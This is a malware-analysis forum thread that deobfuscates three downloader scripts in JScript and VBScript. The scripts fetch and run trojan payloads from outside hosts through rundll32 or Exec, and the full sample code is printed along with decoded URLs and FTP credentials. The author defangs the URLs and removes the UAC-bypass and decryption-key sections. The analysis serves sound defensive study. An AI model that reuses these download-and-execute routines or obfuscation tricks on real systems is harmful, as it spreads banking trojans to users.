Malware Analysis Script : 3 samples from Malware Vault - 5-8-16#8

[DardiM]

https://malwaretips.com/threads/5-8-16-8.62027/
(Thanks to @Solarquest for the "cookies" )

There are several scripted files in this zipped archive : .vbs, .js

I will post here some analysis for "very badly" obfuscated files.

=> It could be interesting to see why some of them there are easily detected by AV/security tools

Some analysis will be very quick because some samples use very "simple" methods

I will certainly end this thread with the "less easy" obfuscated script.

(1) PROTESTOBR-EXTRATO.js

8 / 54
Antivirus scan for 2473516d45ca982d828e983086932fe615b7aabfc0852dfb65447c3e46cd3dc5 at 2016-08-07 04:11:15 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...abfc0852dfb65447c3e46cd3dc5?environmentId=100

I modified the URL to avoid miss click

Spoiler: code

function b64ToUint6 (nChr) {

return nChr > 64 &&
nChr < 91 ? nChr - 65: nChr > 96 &&
nChr < 123 ? nChr - 71: nChr > 47 &&
nChr < 58 ? nChr + 4: nChr === 43 ? 62 : nChr === 47 ? 63: 0;​

}

function UTF8ArrToStr (aBytes) {

var sView = "";​

for (var nPart, nLen = aBytes.length, nIdx = 0; nIdx < nLen; nIdx++) {

nPart = aBytes[nIdx];
sView += String.fromCharCode(
nPart > 251 && nPart < 254 && nIdx + 5 < nLen ?
(nPart - 252) * 1073741824 + (aBytes[++nIdx] - 128 << 24) + (aBytes[++nIdx] - 128 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 247 && nPart < 252 && nIdx + 4 < nLen ?
(nPart - 248 << 24) + (aBytes[++nIdx] - 128 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 239 && nPart < 248 && nIdx + 3 < nLen ?
(nPart - 240 << 18) + (aBytes[++nIdx] - 128 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 223 && nPart < 240 && nIdx + 2 < nLen ?
(nPart - 224 << 12) + (aBytes[++nIdx] - 128 << 6) + aBytes[++nIdx] - 128
: nPart > 191 && nPart < 224 && nIdx + 1 < nLen ?
(nPart - 192 << 6) + aBytes[++nIdx] - 128
: nPart
);​

}
return sView;​

}

function base64DecToArr (sBase64, nBlocksSize) {

var sB64Enc = sBase64.replace(/[^A-Za-z0-9\+\/]/g, ""), nInLen = sB64Enc.length,
nOutLen = nBlocksSize ? Math.ceil((nInLen * 3 + 1 >> 2) / nBlocksSize) * nBlocksSize : nInLen * 3 + 1 >> 2, taBytes = new Array(nOutLen);
for (var nMod3, nMod4, nUint24 = 0, nOutIdx = 0, nInIdx = 0; nInIdx < nInLen; nInIdx++) {

nMod4 = nInIdx & 3;
nUint24 |= b64ToUint6(sB64Enc.charCodeAt(nInIdx)) << 18 - 6 * nMod4;
if (nMod4 === 3 || nInLen - nInIdx === 1) {

for (nMod3 = 0; nMod3 < 3 && nOutIdx < nOutLen; nMod3++, nOutIdx++) {

taBytes[nOutIdx] = nUint24 >>> (16 >>> nMod3 & 24) & 255;​

}​

nUint24 = 0;
}​

}
return taBytes;​

}
(function() {

var XXY = new ActiveXObject( UTF8ArrToStr(base64DecToArr("V1NjcmlwdC5zaGVsbA==")));
var eor = UTF8ArrToStr(
base64DecToArr("aHh4cDovLzIwMC45OC4xNDUuOTEvc3lzdGVtL0JBLTEuMC4wLjAvSVVwZGF0ZS5kbGw="))
var hWa = UTF8ArrToStr(base64DecToArr("QkEtMi4wLjAuMA=="))
var lFL = XXY.ExpandEnvironmentStrings( UTF8ArrToStr(base64DecToArr("JUxPQ0FMQVBQREFUQSU="))) + UTF8ArrToStr(base64DecToArr("XFxJVXBkYXRlLmRsbA=="))

var ont = new ActiveXObject( UTF8ArrToStr(base64DecToArr("TVNYTUwyLlhNTEhUVFA=")))

ont.open( UTF8ArrToStr(base64DecToArr("R0VU")), eor, false)
ont.send()

if (ont.Status == 200) {

var sNu = new ActiveXObject( UTF8ArrToStr(base64DecToArr("QURPREIuU3RyZWFt")))
sNu.Open()
sNu.Type = 1
sNu.Write(ont.ResponseBody)
sNu.Position = 0
sNu.SaveToFile(lFL)
sNu.Close()
XXY.run( UTF8ArrToStr(base64DecToArr('UnVuZGxsMzIuZXhlICI=')) + lFL + UTF8ArrToStr(base64DecToArr('IixXaGl0ZUNvbSA=')) + hWa + ' high');​

} ​

})();

when looking to this script, some function seems to be a little complicated ... or not.
Have you seen the name of functions used ?

b64ToUint6
UTF8ArrToStr
base64DecToArr

the maker of this code is a sympathetic person, he gave to the functions very explicit names :
=> easy to undestand what they do :

b64ToUint6 => bit64 to unsigned int
UTF8ArrToStr => UTF8 array to String
base64DecToArr => base64 (encoded) decoder to array

Easy to understand that they decrypt base64 encoded Strings

You can try with this online tool :
Base64 Decode and Encode - Online

"V1NjcmlwdC5zaGVsbA=="
"aHh4cDovLzIwMC45OC4xNDUuOTEvc3lzdGVtL0JBLTEuMC4wLjAvSVVwZGF0ZS5kbGw="
"QkEtMi4wLjAuMA=="
"JUxPQ0FMQVBQREFUQSU="
"XFxJVXBkYXRlLmRsbA=="
"TVNYTUwyLlhNTEhUVFA="
"R0VU"
"QURPREIuU3RyZWFt"
'UnVuZGxsMzIuZXhlICI='
'IixXaGl0ZUNvbSA='

​

=> "WScript.shell"
=> "hxxp://200.98.145.91/system/BA-1.0.0.0/IUpdate.dll"
=> "BA-2.0.0.0"
=> "%LOCALAPPDATA%"
=> "\\IUpdate.dll"
=> "MSXML2.XMLHTTP"
=> "GET"
=> "ADODB.Stream"
=> 'Rundll32.exe "'
=> ''",WhiteCom '

Then we can completely remove the functions, and get the clear code :

(function() {

var WS= new ActiveXObject( "WScript.shell");
var url= "hxxp://200.98.145.91/system/BA-1.0.0.0/IUpdate.dll";
var hWa = "BA-2.0.0.0";
var file_path= WS.ExpandEnvironmentStrings( "%LOCALAPPDATA%" + "\\IUpdate.dll" );
var http = new ActiveXObject( "MSXML2.XMLHTTP");
http.open("GET", url, false);
http.send();
if (http.Status == 200) { // request ok

var stream= new ActiveXObject("ADODB.Stream");
// uses this object to retrieve data from request and store it in a file
stream.Open();
stream.Type = 1 ;
stream.Write(stream.ResponseBody);
stream.Position = 0 ;
stream.SaveToFile(file_path);
stream.Close()
WS.run( '"rundll32.exe " + file_path + ",WhiteCom '"+ "BA-2.0.0.0" + " high");
//ex : rundll32.exe "C:\Users\DardiM\AppData\Local\ IUpdate.dll", WhiteCom BA-2.0.0.0 high​

} ​

})();

Conlusion :

- Only used one obfuscation method : Base64 encoded strings
- functions names : too easy to understand their purpose
- Zero difficulty : it changes from other analysis I made with 'real' obfuscation methods

Payload : IUpdate.dll
From this familly : HEUR:Trojan-Banker.Win32.Palibu.gen
Antivirus scan for 01f7815b9f99221f15ec306bf343a338f31584c16a0cc2f36e2901cbe7909809 at 2016-08-22 16:36:52 UTC - VirusTotal

Next part : aplicativo.vbs

=> bad obfuscation methods, but some elaborated functions ​

 

[DardiM]

(2) aplicativo.vbs :

18/54
https://www.virustotal.com/it/file/...5243b84c4cf316de64ae3caf4285626cb58/analysis/
https://www.hybrid-analysis.com/sam...4cf316de64ae3caf4285626cb58?environmentId=100

Spoiler: code

Dim winshell
Set winshell = WScript.CreateObject("WScript.Shell")
ImageFile = "bog.zip"
ImageFiles = "bog.exe"
URL = "fftp://shreak%2540accert.website@server166.web-hosting.com/bog.zip"
FTPUSER = "shreak@accert.website"
FTPPASS = "mudar123"
Dim DestFolders
DestFolders = winshell.expandEnvironmentStrings(StrReverse("%ATADPPA%"))
DestFolder = DestFolders
Dim objWMIService, processItems, processName
processName = "wscript.exe"
Dim jordi
jordi = WScript.ScriptFullName
FORCE = "NAO"
UACBYPASS = "NAO"
Set xml = CreateObject("Microsoft.XMLHTTP")
set objShell = CreateObject(CryptXor("c0+\4","N0X") & ".Application")
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Const adSaveCreateNotExist = 1
set oStream = createobject(StrReverse("bdodA") & "." & CryptXor("c,$U9;","V0X"))

principal

Function principal()

If FORCE = "SIM" Then

If WScript.Arguments.length =0 Then

objShell.ShellExecute processName, Chr(34) & jordi & Chr(34) & " uac", "", "runas", 1​

Dim fisga
fisga = StrReverse("root")

Dim gazex
gazex = CryptXor("GP^TWTDJ","90") & ":\\.\" & StrReverse(fisga)

Set objWMIService = GetObject(gazex & "\" & "cimv2")
Set processItems = objWMIService.ExecQuery("Select * from Win32_Process where Name='" & processName & "'")

If processItems.Count = 2 Then

Wscript.Quit​

End If​

objShell.ShellExecute processName, Chr(34) & jordi & Chr(34) & "", "", "",1
Else

rodar
exec​

End If​

ElseIf UACBYPASS = "SIM" Then

rodar
execc​

Else

rodar
exec​

End If​

End Function

Function rodar()

xml.Open "GET", URL, False, FTPUSER, FTPPASS
xml.Send

oStream.type = adTypeBinary
oStream.open
oStream.write xml.responseBody

oStream.savetofile DestFolder & "\" & ImageFile, adSaveCreateOverWrite

oStream.close

set oStream = nothing
Set xml = Nothing

set FilesInZip=objShell.NameSpace(DestFolder & "\" & ImageFile).items
objShell.NameSpace(DestFolder & "\").CopyHere(FilesInZip)​

End Function

Function exec()

winshell.Exec DestFolder & "\" & ImageFiles​

End Function

Function execc()

REMOVED , CODE TO BYPASS UAC​

End Function

Function CryptXor(StringUse,Password)

Dim I
Dim RetStr
Dim Charuse,CharPwd
For I = 1 to Len(StringUse)
charuse = Mid(stringuse,I,1)
charpwd = Mid(password,(I mod len(password))+1,1)
retstr = retstr + chr(asc(charuse) xor asc(charpwd))
Next
CryptXor = retstr​

End Function

1) Looking quickly the code : Some very important parts are not obfuscated

Important values :
FORCE = "NAO" // "NO" => "SIM" = "YES" , "NAO" = "NO" (Portuguese / Brazil)
UACBYPASS = "NAO" // NO

Files :
ImageFile = "bog.zip"
ImageFiles = "bog.exe"

- It uses fttp to download the payload :
LOGIN & PASSWORD IN CLEAR

Spoiler: fttp info

URL = "ftp://shreak%2540accert.website@server166.web-hosting.com/bog.zip"
FTPUSER = "shreak@accert.website"
FTPPASS = "mudar123"

- path : %APPDATA%
ex : C:\Users\DardiM\AppData\Roaming

Spoiler: path

Dim winshell
Set winshell = WScript.CreateObject("WScript.Shell")
DestFolders = winshell.expandEnvironmentStrings(StrReverse("%ATADPPA%"))

- uses a xml object to make the fttp request :

Spoiler: xml object

Set xml = CreateObject("Microsoft.XMLHTTP")
xml.Open "GET", URL, False, FTPUSER, FTPPASS

- stream to write file from request :
set oStream = createobject(StrReverse("bdodA") & "." & CryptXor("c,$U9;","V0X"))
"bdodA" => "Adodb", easy to understand that the last part is ".Stream" => "Adodb.Stream"

Spoiler: url_to_file part

oStream.type = adTypeBinary // 1
oStream.open
oStream.write xml.responseBody
oStream.savetofile DestFolder & "\" & ImageFile, adSaveCreateOverWrite
// example :
oStream.close
set oStream = nothing
Set xml = Nothing

- unzip "bog.zip" :

Extrated files :

bog.exe => undetected
nox.dll => HEUR:Trojan.Win32.Generic​

Spoiler: unzip

set FilesInZip=objShell.NameSpace(DestFolder & "\" & ImageFile).items
objShell.NameSpace(DestFolder & "\").CopyHere(FilesInZip)

- 2 different exec functions are available :
one for normal run, the other to bypass UAC on 32 bits or 64 bits Windows version
I can't show you how to bypass UAC
(but their method works sure from windows 7 to windows 10 14390)

Spoiler: normal exec function

Function exec()

winshell.Exec DestFolder & "\" & ImageFiles
// ex : winshell.Exec("C:\Users\DardiM\AppData\Roaming\bog.exe")​

End Function

- a function is available to force wscript.exe execution :
ShellExecute with or without uac parameter
WMIService used gazex =CryptXor("GP^TWTDJ","90") & "\:\\.\root\cimv2"
// The namespace root/cimv2 is the default namespace and contains the majority of useful classes - PowerShell
=> Set objWMIService = GetObject(gazex & "\" & "cimv2")
=> allows to access to the list of running process.
Here it used to see if wscript.exe is already running

Spoiler: to force wscript.exe

processName = "wscript.exe"
jordi = WScript.ScriptFullName // Returns the full path of the currently running script

If FORCE = "SIM" Then // SIM = "YES" , "NAO" = "NO" (Portuguese / Brazil)

If WScript.Arguments.length =0 Then
// no parameters
objShell.ShellExecute processName, Chr(34) & jordi & Chr(34) & " uac", "", "runas", 1
// wscript.exe, path_of_current_running_script + " uac", "", "runas",1
Dim fisga
fisga = StrReverse("root") // useless reverse => will be reverse after

Dim gazex
gazex = CryptXor("GP^TWTDJ","90") & ":\\.\" & StrReverse(fisga)

Set objWMIService = GetObject(gazex & "\" & "cimv2")
// The namespace root/cimv2 is the default namespace and contains the majority of useful classes
Set processItems = objWMIService.ExecQuery("Select * from Win32_Process where Name='" & processName & "'")
// searching for wscript.exe process
If processItems.Count = 2 Then
// quit if already running

Wscript.Quit​

End If​

objShell.ShellExecute processName, Chr(34) & jordi & Chr(34) & "", "", "",1​

Else
...
...

Intermediate conclusion :
Without using their Function CryptXor(StringUse,Password) we can understand almost all parts

2) For fun, let's see what CryptXor do :

Function CryptXor(StringUse,Password)

Dim I
Dim RetStr
Dim Charuse,CharPwd
For I = 1 to Len(StringUse)
charuse = Mid(stringuse,I,1)
charpwd = Mid(password,(I mod len(password))+1,1)
retstr = retstr + chr(asc(charuse) xor asc(charpwd))
Next
CryptXor = retstr​

End Function

This function has two parameters, StringUse the string to decrypt, and that one they named Password. In a For loop, each char from the StringUse is retrieved and a XOR is done between its code char and a code char from the Password string, but for this one, when all char from Password string have been used, it re inits with first Password char. The function always begin by the second char from Password.
The result of the XOR is converted as char and added to retstr, which will contains at the end the decrypted string , and return it

(I mod len(password) )+1
I : from 1 to the length of the password string

=> a method to loop : mod : modulo

example with password = ""N0X" => the char used will be at position : 2 , 3, 1, 2, 3, 1, etc...
and the char used in charpwd : "0", "X", "N", "0", "X", "N", etc...

StrReverse("bdodA") & "." & CryptXor("c,$U9;","V0X")
=> "Adodb.Stream"

CryptXor("GP^TWTDJ","90") & "\:\\.\root\cimv2"
=> "winmgmts\:\\.\root\cimv2""

CryptXor("c0+\4","N0X") & ".Application"
=> "Shell.Application"

3) Conclusion :

This script is not well obfuscated, but uses a lot of advanced Technics to bypass uac, force wscript.exe to execute, etc.
These methods are used or not, depending on :
FORCE=
UACBYPASS=
values => "SIM" or "NAO" ("YES" or "NO")

I didn't explain in details these methods, and removed the part that shows how it bypass UAC because it's not a tutorial to make hacking vocation

Next part from the same zip archive : a .vbs script that obfuscated very well some parts even if let some strings in clear

 

[DardiM]

(3) NF00983216321771.vbs

9/54
https://www.virustotal.com/en/file/...1de6b0d82b068349608e19de4691881e9d7/analysis/
https://www.hybrid-analysis.com/sam...2b068349608e19de4691881e9d7?environmentId=100

1) Quick look to the code :

Spoiler: code

Dim MRpGeZiLWV1u7KypbYFObgN
Dim MRpGeZiLWV1u7arr2pbYFObgN(5)
MRpGeZiLWV1u7arr2pbYFObgN(4) = "&h"

Function MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7sPxtpbYFObgN, MRpGeZiLWV1u7sPdpbYFObgN)

Dim MRpGeZiLWV1u7aBpbYFObgN(255), MRpGeZiLWV1u7aKypbYFObgN(255)
Dim MRpGeZiLWV1u7sTpbYFObgN
Dim a, b, c, i, j, k
Dim MRpGeZiLWV1u7iCpbYFObgN, MRpGeZiLWV1u7sTwppbYFObgN, MRpGeZiLWV1u7iLhpbYFObgN, MRpGeZiLWV1u7sOpbYFObgN
i = 0:j = 0:b = 0
MRpGeZiLWV1u7iLhpbYFObgN = Len(MRpGeZiLWV1u7sPdpbYFObgN)
For a = 0 To 255
REMOVED
Next
For a = 0 To 255
REMOVED
Next
For c = 1 To Len(MRpGeZiLWV1u7sPxtpbYFObgN)
i = (i + 1) Mod 256
j = (j + MRpGeZiLWV1u7aBpbYFObgN(i)) Mod 256
MRpGeZiLWV1u7sTpbYFObgN = MRpGeZiLWV1u7aBpbYFObgN(i)
MRpGeZiLWV1u7aBpbYFObgN(i) = MRpGeZiLWV1u7aBpbYFObgN(j)
MRpGeZiLWV1u7aBpbYFObgN(j) = MRpGeZiLWV1u7sTpbYFObgN
k = MRpGeZiLWV1u7aBpbYFObgN((MRpGeZiLWV1u7aBpbYFObgN(i) + MRpGeZiLWV1u7aBpbYFObgN(j)) Mod 256)
MRpGeZiLWV1u7iCpbYFObgN = Asc(Mid(MRpGeZiLWV1u7sPxtpbYFObgN, c, 1)) Xor k
MRpGeZiLWV1u7sOpbYFObgN = MRpGeZiLWV1u7sOpbYFObgN & Chr(MRpGeZiLWV1u7iCpbYFObgN)
Next
MRpGeZiLWV1u7CpbYFObgN = MRpGeZiLWV1u7sOpbYFObgN​

End Function

Function MRpGeZiLWV1u7HxTStrpbYFObgN(ByRef MRpGeZiLWV1u7pstxpbYFObgN)

Dim MRpGeZiLWV1u7llgIxpbYFObgN

Dim MRpGeZiLWV1u7llgMxxpbYFObgN
Dim MRpGeZiLWV1u7ltrStrgpbYFObgN
MRpGeZiLWV1u7llgMxxpbYFObgN = Len(MRpGeZiLWV1u7pstxpbYFObgN)
For MRpGeZiLWV1u7llgIxpbYFObgN = 1 To MRpGeZiLWV1u7llgMxxpbYFObgN Step 2

MRpGeZiLWV1u7ltrStrgpbYFObgN = MRpGeZiLWV1u7ltrStrgpbYFObgN & Chr(MRpGeZiLWV1u7arr2pbYFObgN(4) & Mid(MRpGeZiLWV1u7pstxpbYFObgN, MRpGeZiLWV1u7llgIxpbYFObgN, 2))​

Next

MRpGeZiLWV1u7HxTStrpbYFObgN = MRpGeZiLWV1u7ltrStrgpbYFObgN​

End Function

MRpGeZiLWV1u7KypbYFObgN = "j3PZajETCeybwfmbfNl2Nk3Bz0K9my"
MRpGeZiLWV1u7arr2pbYFObgN(0) = "217B3AFC377E48D814259E173CA1ADE300321F974A760E82AAAE7E07DCE822FC7EBB8C8DB5211094"
MRpGeZiLWV1u7arr2pbYFObgN(1) = "04662DFE622208DB0E0DBB1B35A4A1FB011C2E9B48751194BBA923"
MRpGeZiLWV1u7arr2pbYFObgN(2) = "026118E4581949D01335"
MRpGeZiLWV1u7arr2pbYFObgN(3) = "3B7A20E8613D548F5A"

Set MRpGeZiLWV1u7oSlpbYFObgN = CreateObject("WScript.Shell")
MRpGeZiLWV1u7PatpbYFObgN = MRpGeZiLWV1u7oSlpbYFObgN.ExpandEnvironmentStrings("%APPDATA%")
Set MRpGeZiLWV1u7oFSOpbYFObgN = CreateObject("Scripting.FileSystemObject")
If Not MRpGeZiLWV1u7oFSOpbYFObgN.FolderExists(MRpGeZiLWV1u7PatpbYFObgN + "\" + MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(1)),MRpGeZiLWV1u7KypbYFObgN)) Then

Set MRpGeZiLWV1u7objFpbYFObgN = MRpGeZiLWV1u7oFSOpbYFObgN.CreateFolder(MRpGeZiLWV1u7PatpbYFObgN + "\" + MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(1)),MRpGeZiLWV1u7KypbYFObgN)) ​

End If
If MRpGeZiLWV1u7oFSOpbYFObgN.FileExists(MRpGeZiLWV1u7PatpbYFObgN + "\" + MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(1)),MRpGeZiLWV1u7KypbYFObgN) + "\" + MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(2)),MRpGeZiLWV1u7KypbYFObgN)) Then

WScript.Quit(1) ​

Else

Dim MRpGeZiLWV1u7xHttppbYFObgN: Set MRpGeZiLWV1u7xHttppbYFObgN = createobject("MSXML2.ServerXMLHTTP")
Dim MRpGeZiLWV1u7bStrmpbYFObgN: Set MRpGeZiLWV1u7bStrmpbYFObgN = createobject("Adodb.Stream")

MRpGeZiLWV1u7xHttppbYFObgN.Open "GET" , MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(0)),MRpGeZiLWV1u7KypbYFObgN), False
MRpGeZiLWV1u7xHttppbYFObgN.Send()​

With MRpGeZiLWV1u7bStrmpbYFObgN

If MRpGeZiLWV1u7xHttppbYFObgN.status = 200 Then

.type = 1 '//binary
.open()
.write MRpGeZiLWV1u7xHttppbYFObgN.responseBody
.savetofile MRpGeZiLWV1u7PatpbYFObgN + "\" + MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(1)),MRpGeZiLWV1u7KypbYFObgN) + "\" + MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(2)),MRpGeZiLWV1u7KypbYFObgN), 2 '//overwrite
.close()
WScript.Sleep(5000)
Set MRpGeZiLWV1u7WspbYFObgN = CreateObject("WScript.Shell")
Set MRpGeZiLWV1u7ExpbYFObgN = MRpGeZiLWV1u7WspbYFObgN.Exec(MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(3)),MRpGeZiLWV1u7KypbYFObgN) + """" + MRpGeZiLWV1u7PatpbYFObgN + "\" + MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(1)),MRpGeZiLWV1u7KypbYFObgN) + "\" + MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(2)),MRpGeZiLWV1u7KypbYFObgN) + """" + ", AAAx1xxxxxxx110111YYYYYYYYAAAAAAA")
WScript.Sleep(5000)
WScript.Quit(1)​

End If ​

end With
End if

I REMOVED two parts, to avoid copy-paste => exec => infection
On the spoiler part, we can already see and have important clues : I've used color and bold

- 2 functions are called regularly from the main part :
Function MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7sPxtpbYFObgN, MRpGeZiLWV1u7sPdpbYFObgN)
Function MRpGeZiLWV1u7HxTStrpbYFObgN(ByRef MRpGeZiLWV1u7pstxpbYFObgN)
What awful names for these functions and parameters (the same for all vars used in the code)

- a lot for vars or tab with strange strings :

MRpGeZiLWV1u7KypbYFObgN = "j3PZajETCeybwfmbfNl2Nk3Bz0K9my"
MRpGeZiLWV1u7arr2pbYFObgN(0) = "217B3AFC377E48D814259E173CA1ADE300321F974A760E82AAAE7E07DCE822FC7EBB8C8DB5211094"
MRpGeZiLWV1u7arr2pbYFObgN(1) = "04662DFE622208DB0E0DBB1B35A4A1FB011C2E9B48751194BBA923"
MRpGeZiLWV1u7arr2pbYFObgN(2) = "026118E4581949D01335"
MRpGeZiLWV1u7arr2pbYFObgN(3) = "3B7A20E8613D548F5A"
MRpGeZiLWV1u7arr2pbYFObgN(4) = "&h" => just looking at this part, I know it isn't obfuscated : often use in function to make HEX to ASCII​

- a lot of objects created, with clear parameters used (strings) :

If you have already followed one of my analysis, you may recognize "friends" below​

CreateObject("WScript.Shell")
=> to run a program locally, manipulate the contents of the registry, create a shortcut, or access a system folder / path execute, etc...

MRpGeZiLWV1u7oSlpbYFObgN.ExpandEnvironmentStrings("%APPDATA%")
=> above Shell object used to get the %APPDATA% path - ex: "C:\Users\dardiM\AppData\Roaming"

CreateObject("Scripting.FileSystemObject")
=> to create an object will allows to make
files operations
MRpGeZiLWV1u7xHttppbYFObgN = createobject("MSXML2.ServerXMLHTTP")
=> create a ServerXMLHTTP object , here to make the server request

MRpGeZiLWV1u7bStrmpbYFObgN = createobject("Adodb.Stream")
=> object Stream used to store the data received from request, and save it to a file​

- a lot of methods used from objects :

FolderExists, CreateFolder, Quit , Open, Send, write, etc​

- parts you could find "difficult" to understand :

Examples :

MRpGeZiLWV1u7WspbYFObgN.Exec(MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(3)),MRpGeZiLWV1u7KypbYFObgN) + """" + MRpGeZiLWV1u7PatpbYFObgN + "\" + MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(1)),MRpGeZiLWV1u7KypbYFObgN) + "\" + MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(2)),MRpGeZiLWV1u7KypbYFObgN) + """" + ", AAAx1xxxxxxx110111YYYYYYYYAAAAAAA")

MRpGeZiLWV1u7xHttppbYFObgN.Open "GET" , MRpGeZiLWV1u7CpbYFObgN(MRpGeZiLWV1u7HxTStrpbYFObgN(MRpGeZiLWV1u7arr2pbYFObgN(0)),MRpGeZiLWV1u7KypbYFObgN), False
MRpGeZiLWV1u7xHttppbYFObgN.Send()
​

In fact, this is calls to the both "strange" functions seen above, to decode some important strings, from the "strange" var contents we saw (I will decode these parts later)

2) Let's simplify the source with what we have seen above

We will replace the "hard to read" var names by friendly names
This is the main part (without the two functions used to decrypt strings)

Spoiler: most part deobfuscated by hand using Find / replace in notepad++

Dim one_password
Dim tab_of_string(5)
tab_of_string(4) = "&h"
one_password = "j3PZajETCeybwfmbfNl2Nk3Bz0K9my"
tab_of_string(0) = "217B3AFC377E48D814259E173CA1ADE300321F974A760E82AAAE7E07DCE822FC7EBB8C8DB5211094"
tab_of_string(1) = "04662DFE622208DB0E0DBB1B35A4A1FB011C2E9B48751194BBA923"
tab_of_string(2) = "026118E4581949D01335"
tab_of_string(3) = "3B7A20E8613D548F5A"

Set oShell = CreateObject("WScript.Shell")
path = oShell.ExpandEnvironmentStrings("%APPDATA%")

Set oFso = CreateObject("Scripting.FileSystemObject")

If Not oFso.FolderExists(path + "\" + function_decypt(function_hex_to_ascii(tab_of_string(1)),one_password)) Then

Set not_used = oFso.CreateFolder(path + "\" + function_decypt(function_hex_to_ascii(tab_of_string(1)),one_password)) ​

End If

If oFso.FileExists(path + "\" + function_decypt(function_hex_to_ascii(tab_of_string(1)),one_password) + "\" + function_decypt(function_hex_to_ascii(tab_of_string(2)),one_password)) Then

WScript.Quit(1) ​

Else

Dim oXmlRequest: Set oXmlRequest = createobject("MSXML2.ServerXMLHTTP")
Dim oStream: Set oStream = createobject("Adodb.Stream")
oXmlRequest.Open "GET" , function_decypt(function_hex_to_ascii(tab_of_string(0)),one_password), False
oXmlRequest.Send()​

With oStream

If oXmlRequest.status = 200 Then

.type = 1 '//binary
.open()
.write oXmlRequest.responseBody
.savetofile path + "\" + function_decypt(function_hex_to_ascii(tab_of_string(1)),one_password) + "\" +
function_decypt(function_hex_to_ascii(tab_of_string(2)),one_password), 2 '//overwrite
.close()

WScript.Sleep(5000)
Set oShell = CreateObject("WScript.Shell")
Set oShell = oShell.Exec(function_decypt(function_hex_to_ascii(tab_of_string(3)),one_password) + """" + path + "\" + function_decypt(function_hex_to_ascii(tab_of_string(1)),one_password) + "\" + function_decypt(function_hex_to_ascii(tab_of_string(2)),one_password) + """" + ", AAAx1xxxxxxx110111YYYYYYYYAAAAAAA")
WScript.Sleep(5000)
WScript.Quit(1)​

End If ​

end With​

End if

Now the different steps are clear :

- verification of a folder presence : create it if not found
- verification of a file presence : quit if it already exists​

Then if all ok :

- uses the xml object to retrieve the payload
- save the reponseBody with the Adodb.Stream object on a file
- Excecute the payload.
​

Even if we understand a lot of what the script does/uses, complete path and file name for payload downloaded, and also the url used , are still obfuscated

3) Let's decrypt all content :

The smallest function, called in first, only make an HEX to ASCII conversion but from "HEX char representation on string" to a string
ex : "48656C6C6F2021" => "Hello !"

The second function, called in second position, uses this new string and a password string to decrypt and obtain the complete deobfuscated string.

I only made the decoding part by calling on a IDE prog the functions with good strings
(not a dynamic call of the malware script !)

"C:\Users\DardiM\AppData\Roaming\Microsoft\Windows\Templates" => folder
"C:\Users\DardiM\AppData\Roaming\Microsoft\Windows\Templates\KnVhUH.mid" => file
"hxxp://entregacorreiossweb.com.br/SI.mid" => url used

Execute :
oShell.Exec('rundll32, "C:\Users\DardiM\AppData\Roaming\Microsoft\Windows\Templates\KnVhUH.mid", parameter')

=> parameter is "AAAx1xxxxxxx110111YYYYYYYYAAAAAAA"

4) Conclusion :

The most elaborate script from this Malware Vault archive.
Even with some parts in clear that can make some AVs / Tools "suspicious", this .vbs file makes the use of decryption functions inevitable in STATIC analysis to get the principal strings.
The best obfuscation method of the three sample analyzed
(or the "less bad" )

(there is another sample, but analog to what I will name the "new new version of nemucod" (see my precedent post) few changes only)

​

 

[DardiM]

@DardiM said : "there is another sample, but analog to what I will name the "new new version of nemucod" (see my precedent post) few changes only"
Here is a funny part added (I know that I could be the only one to find this fun ! So that's fun too )
https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-532040